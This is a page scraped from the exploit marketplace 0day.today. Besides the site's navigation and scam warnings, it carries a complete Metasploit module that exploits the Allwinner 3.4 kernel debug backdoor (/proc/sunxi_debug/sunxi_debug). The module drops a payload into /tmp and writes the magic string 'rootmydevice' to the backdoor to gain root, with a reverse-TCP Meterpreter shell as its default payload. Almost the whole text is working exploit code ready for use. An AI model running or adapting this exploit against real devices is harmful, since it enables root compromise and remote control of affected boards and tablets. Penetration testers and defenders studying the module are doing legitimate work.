0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require "msf/core" class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, "Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation", "Description" => %q{ This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4 Vulnerable OS: all OS images available for Orange Pis, any for FriendlyARM's NanoPi M1, SinoVoip's M2+ and M3, Cuebietech's Cubietruck + Linksprite's pcDuino8 Uno Exploitation may be possible against Dragon (x10) and Allwinner Android tablets }, "License" => MSF_LICENSE, "Author" => [ "h00die <mike@stcyrsecurity.com>", # Module "KotCzarny" # Discovery ], "Platform" => [ "android", "linux" ], "DisclosureDate" => "Apr 30 2016", "DefaultOptions" => { "payload" => "linux/armle/mettle/reverse_tcp" }, "Privileged" => true, "Arch" => ARCH_ARMLE, "References" => [ [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"], [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \ "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"], [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"] ], "SessionTypes" => [ "shell", "meterpreter" ], 'Targets' => [ [ 'Auto', { } ] ], 'DefaultTarget' => 0, )) end def check backdoor = '/proc/sunxi_debug/sunxi_debug' if file_exist?(backdoor) Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit backdoor = '/proc/sunxi_debug/sunxi_debug' if file_exist?(backdoor) pl = generate_payload_exe exe_file = "/tmp/#{rand_text_alpha(5)}.elf" vprint_good "Backdoor Found, writing payload to #{exe_file}" write_file(exe_file, pl) cmd_exec("chmod +x #{exe_file}") vprint_good 'Escalating' cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}") else print_error "Backdoor #{backdoor} not found." end end end # 0day.today [2024-07-02] #